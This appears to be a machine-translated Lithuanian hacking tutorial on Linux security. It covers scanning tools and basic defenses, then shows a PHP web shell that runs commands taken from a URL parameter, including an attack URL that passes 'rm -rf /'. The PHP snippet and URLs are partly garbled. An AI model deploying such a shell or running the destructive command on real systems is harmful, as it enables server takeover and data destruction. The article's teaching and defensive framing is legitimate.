„Linux“ yra plačiausiai naudojama serverių operacinė sistema, ypač žiniatinklio serveriams. Tai yra atviro kodo; tai reiškia, kad kiekvienas gali turėti prieigą prie šaltinio kodo. Tai daro jį mažiau saugų, palyginti su kitomis operacinėmis sistemomis, nes užpuolikai gali ištirti šaltinio kodą ir rasti pažeidžiamumų . „Linux for Hackers“ siekia išnaudoti šias spragas, kad gautų neteisėtą prieigą prie sistemos.
Šiame straipsnyje mes supažindinsime jus su „Linux“, jo saugumo spragomis, įsilaužimais naudojant „Ubuntu“ ir kovos priemonėmis, kurias galite įdiegti.
Šioje pamokoje aptartos temos
- Greita pastaba apie „Linux“
- „Linux“ įsilaužimo įrankiai
- Kaip išvengti „Linux“ įsilaužimų
- Įsilaužimas: įsilaužkite į „Linux“ sistemą naudodami PHP
Greita pastaba apie „Linux“
„Linux“ yra atvirojo kodo operacinė sistema . Yra daugybė „Linux“ pagrindu veikiančių operacinių sistemų, tokių kaip „Redhat“, „Fedora“, „Ubuntu“ ir kt., Skirstymai. Skirtingai nuo kitų operacinių sistemų, „Linux“ yra mažiau saugi, kai kalbama apie saugumą. Taip yra todėl, kad šaltinio kodas yra laisvai prieinamas, todėl jį lengva ištirti dėl pažeidžiamumų ir juos išnaudoti, palyginti su kitomis operacinėmis sistemomis, kurios nėra atvirojo kodo. „Linux“ gali būti naudojama kaip serverio, darbalaukio, planšetinio kompiuterio ar mobiliojo įrenginio operacinė sistema.
„Linux“ programas galima valdyti naudojant GUI arba komandas. „Kali Linux“ įsilaužimui skirtos „Linux“ komandos yra efektyvesnės ir efektyvesnės, palyginti su GUI naudojimu. Dėl šios priežasties tai padeda žinoti pagrindines įsilaužimo „Linux“ komandas.
Žr. Šias pamokas https://www.guru99.com/unix-linux-tutorial.html, kaip pradėti naudotis „Kali Linux“ įsilaužimais.
„Linux“ įsilaužimo įrankiai
- „Nessus“ - šį įrankį galima naudoti norint įsilaužti į „Ubuntu“, nuskaityti konfigūracijos nustatymus, pataisas, tinklus ir pan. Jį galite rasti adresu https://www.tenable.com/products/nessus
- NMap. Šis įrankis gali būti naudojamas stebint serverius, kurie veikia serveryje, ir paslaugomis, kurias jie naudoja. Jis taip pat gali būti naudojamas ieškant uostų. Jį galite rasti https://nmap.org/
- SARA - SARA yra saugos auditoriaus tyrimų padėjėjo akronimas. Kaip rodo pavadinimas, šis įrankis gali būti naudojamas audituoti tinklus nuo grėsmių, tokių kaip „SQL Injection“, „XSS“ ir kt., Ją galima rasti adresu http://www-arc.com/sara/sara.html
Ankstesnis sąrašas nėra išsamus; tai suteikia jums idėjų apie prieinamus „Ubuntu“ įsilaužimo ir „Linux“ įsilaužimo įrankius.
Kaip išvengti „Linux“ įsilaužimų
„Linux Hacking“ naudojasi operacinės sistemos spragomis. Organizacija gali taikyti šią politiką, kad apsisaugotų nuo tokių išpuolių.
- Pleistrų valdymas - pataisymai ištaiso klaidas, kurias užpuolikai išnaudoja pažeisdami sistemą. Tinkama pleistrų valdymo politika užtikrins, kad sistemoje nuolat pritaikysite atitinkamus pleistrus.
- Tinkama OS konfigūracija - kiti išnaudojimai naudojasi serverio konfigūracijos trūkumais. Neaktyvūs vartotojo vardai ir demonai turėtų būti išjungti. Reikėtų pakeisti numatytuosius nustatymus, tokius kaip įprasti programos slaptažodžiai, numatytieji vartotojo vardai ir kai kurie prievado numeriai.
- Įsibrovimo aptikimo sistema - tokiais įrankiais galima aptikti neteisėtą prieigą prie sistemos. Kai kurios priemonės gali aptikti ir užkirsti kelią tokioms atakoms.
Įsilaužimas: įsilaužkite į „Ubuntu Linux“ sistemą naudodami PHP
Šiame praktiniame scenarijuje sužinosime, kaip įsilaužti naudojant „Ubuntu“, ir pateiksime jums pagrindinę informaciją apie tai, kaip galite naudoti PHP kompromituodami „Linux“. Mes neketiname nukreipti nė vienos aukos. Jei norite tai išbandyti, galite įdiegti LAMPP savo vietiniame kompiuteryje.
PHP yra dvi funkcijos, kurios gali būti naudojamos vykdant „Linux“ įsilaužimo komandas. Turi funkcijas exec () ir shell_exec (). Funkcija exec () grąžina paskutinę komandos išvesties eilutę, o shell_exec () grąžina visą komandos rezultatą kaip eilutę.
Demonstravimo tikslais tarkime, kad užpuolikų valdytojai įkelia šį failą į žiniatinklio serverį.
$cmd";$output = shell_exec($cmd);echo "$output";?>
ČIA
Pirmiau pateiktas scenarijus gauna komandą iš GET kintamojo, pavadinto cmd. Komanda vykdoma naudojant shell_exec (), o rezultatai pateikiami naršyklėje.
Pirmiau pateiktą kodą galima naudoti naudojant šį URL
http: //localhost/cp/konsole.php? cmd = ls% 20-l
ČIA
- „… Konsole.php? Cmd = ls% 20-l“ kintamajam cmd priskiria reikšmę ls -l .
"Ubuntu" komanda, skirta įsilaužimui į serverį, bus vykdoma kaip
shell_exec('ls -l') ;
Vykdant aukščiau nurodytą kodą žiniatinklio serveryje gaunami panašūs rezultatai.
Pirmiau nurodyta komanda paprasčiausiai rodo failus dabartiniame kataloge ir leidimus
Tarkime, kad užpuolikas perduoda šią komandą
rm -rf /
ČIA
- „Rm“ pašalina failus
- „Rf“ priverčia rm komandą vykdyti rekursyviuoju režimu. Ištrinami visi aplankai ir failai
- „/“ Nurodo komandai pradėti ištrinti failus iš šakninio katalogo
Atakos URL atrodys maždaug taip
http: //localhost/cp/konsole.php? cmd = rm% 20-rf% 20 /
Santrauka
- „Linux“ yra populiari operacinė sistema serveriams, staliniams kompiuteriams, planšetiniams kompiuteriams ir mobiliesiems įrenginiams.
- „Linux“ yra atviras šaltinis, ir šaltinio kodą gali gauti visi. Tai leidžia lengvai pastebėti pažeidžiamumus. Tai yra viena iš geriausių įsilaužėlių OS.
- Pagrindinės ir tinklinio įsilaužimo komandos „Ubuntu“ yra vertingos „Linux“ įsilaužėliams.
- Pažeidžiamumas yra silpnybė, kurią galima panaudoti norint pažeisti sistemą.
- Geras saugumas gali padėti apsaugoti sistemą nuo užpuoliko pavojaus.